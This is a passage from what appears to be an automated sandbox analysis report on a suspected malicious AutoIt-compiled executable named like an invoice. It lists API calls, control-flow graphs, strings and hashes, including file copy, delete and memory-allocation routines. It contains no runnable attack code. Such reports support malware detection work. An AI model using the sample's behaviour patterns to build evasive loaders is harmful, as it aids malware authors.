                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __getptd_noexit
                                                                                                                • String ID:
                                                                                                                • API String ID: 3074181302-0
                                                                                                                • Opcode ID: ab37caf1cbe9409989b5f45213019e582d20ceafab03d889e289ecb50e80728b
                                                                                                                • Instruction ID: 717d9e84cbc28686dc5dddd3b9e1f4358750f6284342ee7717bdd6730f81459e
                                                                                                                • Opcode Fuzzy Hash: ab37caf1cbe9409989b5f45213019e582d20ceafab03d889e289ecb50e80728b
                                                                                                                • Instruction Fuzzy Hash: 53324670A042459FDB218F6CCC80BEEBBB1AF55314F24456BE8599B392C7389C4AC779

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • _wcscpy.LIBCMT ref: 004DFA96
                                                                                                                • _wcschr.LIBCMT ref: 004DFAA4
                                                                                                                • _wcscpy.LIBCMT ref: 004DFABB
                                                                                                                • _wcscat.LIBCMT ref: 004DFACA
                                                                                                                • _wcscat.LIBCMT ref: 004DFAE8
                                                                                                                • _wcscpy.LIBCMT ref: 004DFB09
                                                                                                                • __wsplitpath.LIBCMT ref: 004DFBE6
                                                                                                                • _wcscpy.LIBCMT ref: 004DFC0B
                                                                                                                • _wcscpy.LIBCMT ref: 004DFC1D
                                                                                                                • _wcscpy.LIBCMT ref: 004DFC32
                                                                                                                • _wcscat.LIBCMT ref: 004DFC47
                                                                                                                • _wcscat.LIBCMT ref: 004DFC59
                                                                                                                • _wcscat.LIBCMT ref: 004DFC6E
                                                                                                                  • Part of subcall function 004DBFA4: _wcscmp.LIBCMT ref: 004DC03E
                                                                                                                  • Part of subcall function 004DBFA4: __wsplitpath.LIBCMT ref: 004DC083
                                                                                                                  • Part of subcall function 004DBFA4: _wcscpy.LIBCMT ref: 004DC096
                                                                                                                  • Part of subcall function 004DBFA4: _wcscat.LIBCMT ref: 004DC0A9
                                                                                                                  • Part of subcall function 004DBFA4: __wsplitpath.LIBCMT ref: 004DC0CE
                                                                                                                  • Part of subcall function 004DBFA4: _wcscat.LIBCMT ref: 004DC0E4
                                                                                                                  • Part of subcall function 004DBFA4: _wcscat.LIBCMT ref: 004DC0F7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                                                                • String ID: >>>AUTOIT SCRIPT<<<
                                                                                                                • API String ID: 2955681530-2806939583
                                                                                                                • Opcode ID: 4a55a62f13dd33f9664dcc34b1657b3170d166b7aa17d790a6aac63fc77c0398
                                                                                                                • Instruction ID: 478b8590bf668383ae9041a163d1a70ad9250de41c94a2e3f0b1de8fba9a0fa1
                                                                                                                • Opcode Fuzzy Hash: 4a55a62f13dd33f9664dcc34b1657b3170d166b7aa17d790a6aac63fc77c0398
                                                                                                                • Instruction Fuzzy Hash: 2A919071504205AFDF20EB55C851E9BB7E8BF84318F00486FF94A97391DB39EA48CB99

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1005 4dbfa4-4dc054 call 4bf8a0 call 4af4ea call 4947b7 call 4dbdb4 call 494517 call 4b15e3 1018 4dc05a-4dc061 call 4dc56d 1005->1018 1019 4dc107-4dc10e call 4dc56d 1005->1019 1024 4dc067-4dc105 call 4b1dfc call 4b0d23 call 4b0cf4 call 4b1dfc call 4b0cf4 * 2 1018->1024 1025 4dc110-4dc112 1018->1025 1019->1025 1026 4dc117 1019->1026 1029 4dc11a-4dc1d6 call 4944ed * 8 call 4dc71a call 4b3499 1024->1029 1028 4dc367-4dc368 1025->1028 1026->1029 1032 4dc385-4dc393 call 4947e2 1028->1032 1064 4dc1df-4dc1fa call 4dbdf8 1029->1064 1065 4dc1d8-4dc1da 1029->1065 1068 4dc28c-4dc298 call 4b35e4 1064->1068 1069 4dc200-4dc208 1064->1069 1065->1028 1076 4dc2ae-4dc2b2 1068->1076 1077 4dc29a-4dc2a9 DeleteFileW 1068->1077 1071 4dc20a-4dc20e 1069->1071 1072 4dc210 1069->1072 1073 4dc215-4dc233 call 4944ed 1071->1073 1072->1073 1081 4dc25d-4dc273 call 4db791 call 4b2aae 1073->1081 1082 4dc235-4dc23b 1073->1082 1079 4dc2b8-4dc32f call 4dc81d call 4dc845 call 4db965 1076->1079 1080 4dc342-4dc356 CopyFileW 1076->1080 1077->1028 1085 4dc36a-4dc380 DeleteFileW call 4dc6d9 1079->1085 1101 4dc331-4dc340 DeleteFileW 1079->1101 1084 4dc358-4dc365 DeleteFileW 1080->1084 1080->1085 1098 4dc278-4dc283 1081->1098 1087 4dc23d-4dc250 call 4dbf2e 1082->1087 1084->1028 1085->1032 1096 4dc252-4dc25b 1087->1096 1096->1081 1098->1069 1100 4dc289 1098->1100 1100->1068 1101->1028
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004DBDB4: __time64.LIBCMT ref: 004DBDBE
                                                                                                                  • Part of subcall function 00494517: _fseek.LIBCMT ref: 0049452F
                                                                                                                • __wsplitpath.LIBCMT ref: 004DC083
                                                                                                                  • Part of subcall function 004B1DFC: __wsplitpath_helper.LIBCMT ref: 004B1E3C
                                                                                                                • _wcscpy.LIBCMT ref: 004DC096
                                                                                                                • _wcscat.LIBCMT ref: 004DC0A9
                                                                                                                • __wsplitpath.LIBCMT ref: 004DC0CE
                                                                                                                • _wcscat.LIBCMT ref: 004DC0E4
                                                                                                                • _wcscat.LIBCMT ref: 004DC0F7
                                                                                                                • _wcscmp.LIBCMT ref: 004DC03E
                                                                                                                  • Part of subcall function 004DC56D: _wcscmp.LIBCMT ref: 004DC65D
                                                                                                                  • Part of subcall function 004DC56D: _wcscmp.LIBCMT ref: 004DC670
                                                                                                                • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 004DC2A1
                                                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 004DC338
                                                                                                                • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 004DC34E
                                                                                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 004DC35F
                                                                                                                • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 004DC371
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 2378138488-0
                                                                                                                • Opcode ID: 48ca6559c02c703cf74ac9092ac1fdbfdaf3bfc80e998037978b3481d8f6127c
                                                                                                                • Instruction ID: c3cfeb4c1b221b688838c23a3cb8a23171ef06fbca0a4d82c54c866c66bf00f1
                                                                                                                • Opcode Fuzzy Hash: 48ca6559c02c703cf74ac9092ac1fdbfdaf3bfc80e998037978b3481d8f6127c
                                                                                                                • Instruction Fuzzy Hash: C6C139B1D00229ABDF11DF95CC91EDEBBBDAF49304F0040ABB609E6251DB349A45CF65

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00493E79
                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00493E88
                                                                                                                • LoadIconW.USER32(00000063), ref: 00493E9E
                                                                                                                • LoadIconW.USER32(000000A4), ref: 00493EB0
                                                                                                                • LoadIconW.USER32(000000A2), ref: 00493EC2
                                                                                                                  • Part of subcall function 00494024: LoadImageW.USER32(00490000,00000063,00000001,00000010,00000010,00000000), ref: 00494048
                                                                                                                • RegisterClassExW.USER32(?), ref: 00493F30
                                                                                                                  • Part of subcall function 00493F53: GetSysColorBrush.USER32(0000000F), ref: 00493F86
                                                                                                                  • Part of subcall function 00493F53: RegisterClassExW.USER32(00000030), ref: 00493FB0
                                                                                                                  • Part of subcall function 00493F53: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00493FC1
                                                                                                                  • Part of subcall function 00493F53: LoadIconW.USER32(000000A9), ref: 00494004
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                                                                                                                • String ID: #$0$AutoIt v3
                                                                                                                • API String ID: 2880975755-4155596026
                                                                                                                • Opcode ID: c1e81ce2b57f54a2de9ad122bea48d1a958c718783606fa5560d16f8bcd61946
                                                                                                                • Instruction ID: 1617d1b9b6e88a3b09637b0d220583fc189a5b2080cda277f51ad40de9a71310
                                                                                                                • Opcode Fuzzy Hash: c1e81ce2b57f54a2de9ad122bea48d1a958c718783606fa5560d16f8bcd61946
                                                                                                                • Instruction Fuzzy Hash: 2E214CB0D00704ABCB00DFA9ED59B9DBFF5FB58311F00816AE214A22A0D7754648EBA9

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00493F86
                                                                                                                • RegisterClassExW.USER32(00000030), ref: 00493FB0
                                                                                                                • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00493FC1
                                                                                                                • LoadIconW.USER32(000000A9), ref: 00494004
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                                                                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                • API String ID: 975902462-1005189915
                                                                                                                • Opcode ID: de845ac7979ea9d50eccf54c592ee9a3e84c06f22a6123b6f721a10cd3fe74b9
                                                                                                                • Instruction ID: 741ff10c95782fb8b39dcbd7fd2a0b1891f4990146b4d40b38a5c4f80b7ce6b7
                                                                                                                • Opcode Fuzzy Hash: de845ac7979ea9d50eccf54c592ee9a3e84c06f22a6123b6f721a10cd3fe74b9
                                                                                                                • Instruction Fuzzy Hash: 3721C7B5901318AFDB00DFA4E899BCDBFB4FB28741F10811AF515A62A0D7B44548AFA5

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1292 1347490-13474e2 call 1347390 CreateFileW 1295 13474e4-13474e6 1292->1295 1296 13474eb-13474f8 1292->1296 1297 1347644-1347648 1295->1297 1299 13474fa-1347506 1296->1299 1300 134750b-1347522 VirtualAlloc 1296->1300 1299->1297 1301 1347524-1347526 1300->1301 1302 134752b-1347551 CreateFileW 1300->1302 1301->1297 1304 1347575-134758f ReadFile 1302->1304 1305 1347553-1347570 1302->1305 1306 1347591-13475ae 1304->1306 1307 13475b3-13475b7 1304->1307 1305->1297 1306->1297 1308 13475d8-13475ef WriteFile 1307->1308 1309 13475b9-13475d6 1307->1309 1312 13475f1-1347618 1308->1312 1313 134761a-134763f CloseHandle VirtualFree 1308->1313 1309->1297 1312->1297 1313->1297
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 013474D5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1300511747.0000000001346000.00000040.00000020.00020000.00000000.sdmp, Offset: 01346000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1346000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 823142352-0
                                                                                                                • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                                                                                • Instruction ID: f0d5bba223af70979df6cb7ab96c9ecd2fe8b7ee4f3a5ee7b8ae827c530604be
                                                                                                                • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                                                                                • Instruction Fuzzy Hash: 2B511C75A10248FBDF20DFA4CC49FEE77B9AF48714F108554FA09EA180DB74A6448B64

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1322 4949fb-494a25 call 49bcce RegOpenKeyExW 1325 494a2b-494a2f 1322->1325 1326 5041cc-5041e3 RegQueryValueExW 1322->1326 1327 5041e5-504222 call 4af4ea call 4947b7 RegQueryValueExW 1326->1327 1328 504246-50424f RegCloseKey 1326->1328 1333 504224-50423b call 496a63 1327->1333 1334 50423d-504245 call 4947e2 1327->1334 1333->1334 1334->1328
                                                                                                                APIs
                                                                                                                • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00494A1D
                                                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 005041DB
                                                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0050421A
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00504249
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: QueryValue$CloseOpen
                                                                                                                • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                                                • API String ID: 1586453840-614718249
                                                                                                                • Opcode ID: 803807a1acc4216c75796a854ed70f8bb2ba571ef9f12390689854088573293e
                                                                                                                • Instruction ID: 9d5c585125a03a1272796e327cc751a10c6a24f625fb3d9d2839b18f4f2088b9
                                                                                                                • Opcode Fuzzy Hash: 803807a1acc4216c75796a854ed70f8bb2ba571ef9f12390689854088573293e
                                                                                                                • Instruction Fuzzy Hash: 95116D71600119BEEB00ABA4DD8ADEF7BBCEF19344F004069B506E2191EA74AE06DB64

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1349 4936b8-493728 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                APIs
                                                                                                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 004936E6
                                                                                                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00493707
                                                                                                                • ShowWindow.USER32(00000000,?,?,?,?,00493AA3,?), ref: 0049371B
                                                                                                                • ShowWindow.USER32(00000000,?,?,?,?,00493AA3,?), ref: 00493724
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$CreateShow
                                                                                                                • String ID: AutoIt v3$edit
                                                                                                                • API String ID: 1584632944-3779509399
                                                                                                                • Opcode ID: a2637944bea2773fb6acd9cae5d3314324b59edd5fc97ec506e890fd86960628
                                                                                                                • Instruction ID: 3c58eb7c799c0431e1fa95d7d5357c20df64fa2901ede2f68aee24aeff74dc03
                                                                                                                • Opcode Fuzzy Hash: a2637944bea2773fb6acd9cae5d3314324b59edd5fc97ec506e890fd86960628
                                                                                                                • Instruction Fuzzy Hash: 2FF0DA715407D47BE7315757AC1CF6B2E7DE7E7F21B00411ABA04A21F0C6650899EAB8

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1454 4951af-4951c5 1455 4951cb-4951e0 call 496b0f 1454->1455 1456 4952a2-4952a6 1454->1456 1459 503ca1-503cb0 LoadStringW 1455->1459 1460 4951e6-495206 call 496a63 1455->1460 1463 503cbb-503cd3 call 49510d call 494db1 1459->1463 1460->1463 1464 49520c-495210 1460->1464 1473 495220-49529d call 4b0d50 call 4950e6 call 4b0d23 Shell_NotifyIconW call 49cb37 1463->1473 1476 503cd9-503cf7 call 49518c call 494db1 call 49518c 1463->1476 1466 4952a7-4952b0 call 496eed 1464->1466 1467 495216-49521b call 49510d 1464->1467 1466->1473 1467->1473 1473->1456 1476->1473
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 0049522F
                                                                                                                • _wcscpy.LIBCMT ref: 00495283
                                                                                                                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00495293
                                                                                                                • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00503CB0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                                                                                • String ID: Line:
                                                                                                                • API String ID: 1053898822-1585850449
                                                                                                                • Opcode ID: 38c660afd3f04f2c5b3f1330aa174851e3cfb7861211e9131ea586287ad68f83
                                                                                                                • Instruction ID: 8e92e208b3d5ea42027c9bba223b6102b31f287cc1c1338300e5d6e929e5b3a5
                                                                                                                • Opcode Fuzzy Hash: 38c660afd3f04f2c5b3f1330aa174851e3cfb7861211e9131ea586287ad68f83
                                                                                                                • Instruction Fuzzy Hash: BE31C0314087406BDB21EB61EC46FDA7FD8AB44308F10452FF585821E1EB78A54CCB9A

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1489 4940e5-494105 call 4bf8a0 1492 49410b-494136 call 49660f call 4940a7 call 4949a0 call 494139 1489->1492 1493 50370e-503777 call 4b0d50 1489->1493 1502 503780-503789 call 496a63 1493->1502 1503 503779 1493->1503 1506 50378e 1502->1506 1503->1502 1506->1506
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 00503725
                                                                                                                  • Part of subcall function 0049660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004953B1,?,?,004961FF,?,00000000,00000001,00000000), ref: 0049662F
                                                                                                                  • Part of subcall function 004940A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 004940C6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: NamePath$FullLong_memset
                                                                                                                • String ID: AutoIt script files (*.au3, *.a3x)$Run Script:$X$au3
                                                                                                                • API String ID: 3051022977-1954568251
                                                                                                                • Opcode ID: 25660c453ac23ac9dbcfe8915e621b45109fd1deec2cac343fbb4ff487b96a66
                                                                                                                • Instruction ID: dddaa1c2e6107c506747973b1e536037d118504843350736662012460e850fae
                                                                                                                • Opcode Fuzzy Hash: 25660c453ac23ac9dbcfe8915e621b45109fd1deec2cac343fbb4ff487b96a66
                                                                                                                • Instruction Fuzzy Hash: 4321AB719101589BCF01DF95C845BDE7FFCAF89308F00406EE405A7281DBB85A898F65
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004941A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,004939FE,?,00000001), ref: 004941DB
                                                                                                                • _free.LIBCMT ref: 005036B7
                                                                                                                • _free.LIBCMT ref: 005036FE
                                                                                                                  • Part of subcall function 0049C833: __wsplitpath.LIBCMT ref: 0049C93E
                                                                                                                  • Part of subcall function 0049C833: _wcscpy.LIBCMT ref: 0049C953
                                                                                                                  • Part of subcall function 0049C833: _wcscat.LIBCMT ref: 0049C968
                                                                                                                  • Part of subcall function 0049C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0049C978
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                                                                                • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                                                • API String ID: 805182592-1757145024
                                                                                                                • Opcode ID: 0fb88f591884323bc4cddd8e5281ab118d7c5b07429d50c354fed021b6b3bec5
